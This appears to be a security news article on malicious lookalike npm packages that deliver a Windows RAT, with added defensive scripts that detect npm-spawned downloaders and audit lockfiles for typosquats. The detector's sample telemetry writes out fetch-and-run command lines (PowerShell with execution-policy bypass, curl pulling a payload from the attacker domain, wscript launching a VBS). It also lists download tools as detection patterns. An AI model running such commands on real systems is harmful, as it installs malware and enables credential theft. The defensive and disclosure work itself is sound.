Ravie Lakshmanan | Jun 23, 2026 | Supply Chain Attack / Developer Security

Cybersecurity researchers have discovered a set of malicious npm packages that are designed to deliver a Windows-based remote access trojan (RAT).

The list of identified packages is below –

  • aes-decode-runner-pro (145 downloads)
  • postcss-minify-selector (256 downloads)
  • postcss-minify-selector-parser (615 downloads)

All the packages were published over the past month by an npm user named “abdrizak” and continue to be available for download from npm as of writing. 

“Aes-decode-runner-pro and postcss-minify-selector-parser both present themselves as layered AES/custom-codec packages and depend on the legitimate postcss-selector-parser,” JFrog said in an analysis. “Postcss-minify-selector presents itself as a PostCSS selector minifier and depends on postcss-minify-selector-parser.”

As for “postcss-minify-selector-parser,” the name is a reference to “postcss-selector-parser,” a widely used npm library with more than 127 million weekly downloads. Regardless of the package downloaded, the attack chain leads to the deployment of the same Windows malware.

The packages come embedded with a JavaScript dropper that writes a PowerShell script (“settings.ps1”) to disk and executes it. The PowerShell script then acts as a downloader for a next-stage payload retrieved from an external server (“nvidiadriver[.]net”) using “curl.exe.”

The retrieved payload is a ZIP archive, from which a Visual Basic Script (“update.vbs”) file is extracted and run using “wscript.exe.” Also bundled in the downloaded ZIP file is a Python runtime, a Python loader (“loader.py”), and a number of Python extension modules (*.pyd) compiled using Nuitka.

The Visual Basic Script is responsible for setting up the Python environment on the compromised host and launching the “loader.py” script, which then triggers the core logic of the malware. The RAT is equipped to gather host information, siphon credentials from Google Chrome, collect data from Chrome extensions, run shell commands, and download/upload files to and from a command-and-control (C2) server (“95.216.92[.]207:8080”).
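The chain described above (npm install script spawning PowerShell, which in turn spawns curl.exe and wscript.exe) is visible to endpoint telemetry as a parent/child process relationship rooted at node.exe. The following is an added detection example written for this article, not JFrog's tooling or anything from the malicious packages: it walks the parent chain of constructed process-creation events (PIDs, paths and command lines are made up to mirror the article's chain, with the domain kept defanged) and flags any script host or download utility that descends from a Node/npm process.

```python
"""Flag script hosts and download tools spawned under node/npm.

Added example for the attack chain in the article; not JFrog's code.
The events below are constructed: PIDs, paths and command lines are
illustrative, and the domain is kept in the article's defanged form.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


# Constructed sample telemetry modelled on the chain described above.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "node.exe",
              r"node C:\proj\node_modules\postcss-minify-selector\install.js"),
    ProcEvent(101, 100, "powershell.exe",
              r"powershell -ep bypass -File C:\Users\dev\AppData\Local\Temp\settings.ps1"),
    ProcEvent(102, 101, "curl.exe",
              r"curl.exe -o C:\Users\dev\AppData\Local\Temp\pkg.zip https://nvidiadriver[.]net/pkg.zip"),
    ProcEvent(103, 101, "wscript.exe",
              r"wscript.exe C:\Users\dev\AppData\Local\Temp\update.vbs"),
    # Benign build activity that must not be flagged.
    ProcEvent(200, 1, "node.exe", "node build.js"),
    ProcEvent(201, 200, "esbuild.exe", "esbuild src/index.ts"),
]

NODE_IMAGES = {"node.exe", "npm.exe", "npm.cmd", "npx.cmd"}

# Stages of the chain in the article, keyed by the image that performs them.
STAGE_BY_IMAGE = {
    "powershell.exe": "dropper-script",
    "pwsh.exe": "dropper-script",
    "curl.exe": "downloader",
    "certutil.exe": "downloader",
    "bitsadmin.exe": "downloader",
    "wscript.exe": "vbs-launcher",
    "cscript.exe": "vbs-launcher",
}


def nearest_node_ancestor(ev, by_pid, max_depth=8):
    """Walk up the parent chain; return the closest node/npm ancestor or None."""
    cur = by_pid.get(ev.ppid)
    depth = 0
    while cur is not None and depth < max_depth:
        if cur.image in NODE_IMAGES:
            return cur
        cur = by_pid.get(cur.ppid)
        depth += 1
    return None


def find_npm_spawned_tooling(events):
    """Return (pid, image, stage, root_node_pid) for every suspicious descendant."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        stage = STAGE_BY_IMAGE.get(ev.image)
        if stage is None:
            continue
        root = nearest_node_ancestor(ev, by_pid)
        if root is not None:
            findings.append((ev.pid, ev.image, stage, root.pid))
    return findings


if __name__ == "__main__":
    for pid, image, stage, root in find_npm_spawned_tooling(SAMPLE_EVENTS):
        print(f"pid {pid} {image} [{stage}] spawned under node pid {root}")
```

The rule keys on lineage rather than on the specific file names from this campaign, so a renamed script or a different download utility still matches; in a real deployment the image set would be tuned against the build tools a given CI host legitimately runs.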

These features are realized through a set of Python native extension modules –

  • config.pyd, which contains constants, command IDs, C2 URL, registry key names
  • api.pyd, which handles HTTP C2 packet exchange
  • audiodriver.pyd, which handles the main RAT orchestration loop
  • command.pyd, which profiles the host, runs virtual machine (VM) checks, file transfer, and shell execution
  • auto.pyd, which performs Chrome credential and extension theft, bypassing app-bound encryption (ABE) protections
  • util.pyd, which acts as tar/gzip archive helpers

“This case shows how a small parser-like package can hide a multi-stage Windows payload while appearing related to legitimate build tooling with massive weekly usage,” JFrog said. “For defenders, the important lesson is to treat lookalike build dependencies as potential delivery mechanisms,…
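One concrete way to act on that lesson is to audit a lockfile for the reported package names and for names that imitate a popular dependency. The script below is an added example for this article, not JFrog's tooling: it reads a constructed package-lock.json (lockfileVersion 3, placeholder versions), flags the three package names reported above, and applies two lookalike heuristics against a small allowlist of well-known names, a hyphen-token superset check (which catches postcss-minify-selector-parser wrapping postcss-selector-parser) and a short edit distance. The names postcss-selector-parser-pro and postcss-selectr-parser in the sample are constructed to exercise those two heuristics and are not packages reported on this page.

```python
"""Audit a package-lock.json for reported and lookalike package names.

Added example for the article; not JFrog's code. KNOWN_MALICIOUS holds the
three names reported above; the sample lockfile and its versions are
constructed, and the two lookalike names in it are invented test cases.
"""
import json

KNOWN_MALICIOUS = {
    "aes-decode-runner-pro",
    "postcss-minify-selector",
    "postcss-minify-selector-parser",
}

# Small allowlist of popular names a lookalike might imitate.
POPULAR = ["postcss-selector-parser", "postcss", "lodash"]

# Constructed lockfile; versions are placeholders, not real releases.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/postcss": {"version": "0.0.0"},
        "node_modules/postcss-selector-parser": {"version": "0.0.0"},
        "node_modules/postcss-minify-selector": {"version": "0.0.0"},
        "node_modules/postcss-minify-selector-parser": {"version": "0.0.0"},
        "node_modules/postcss-selector-parser-pro": {"version": "0.0.0"},
        "node_modules/postcss-selectr-parser": {"version": "0.0.0"},
        "node_modules/lodash": {"version": "0.0.0"},
    },
})


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def tokens(name):
    return set(name.lower().split("-"))


def classify(name):
    """Return a reason string if the name is suspicious, else None."""
    if name in KNOWN_MALICIOUS:
        return "known-malicious"
    if name in POPULAR:
        return None
    # A name that contains every token of a multi-token popular package
    # plus extra words reads as a plugin or variant of it.
    for pop in POPULAR:
        if len(tokens(pop)) >= 2 and tokens(pop) < tokens(name):
            return f"token-superset of {pop}"
    # A name within two edits of a popular package is a likely typosquat.
    for pop in POPULAR:
        dist = levenshtein(name, pop)
        if dist <= 2:
            return f"edit-distance {dist} from {pop}"
    return None


def audit_lockfile(lock_text):
    """Return [(package_name, reason)] for every suspicious entry, in file order."""
    lock = json.loads(lock_text)
    findings = []
    for path in lock.get("packages", {}):
        if path == "":
            continue                       # root project entry
        name = path.split("node_modules/")[-1]
        reason = classify(name)
        if reason is not None:
            findings.append((name, reason))
    return findings


if __name__ == "__main__":
    for name, reason in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}: {reason}")
```

The token-superset rule is deliberately limited to multi-token allowlist entries; applied to a single token such as "postcss" it would flag every legitimate plugin, so the allowlist and thresholds need tuning to the ecosystem slice a project actually uses.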

Last Update: June 23, 2026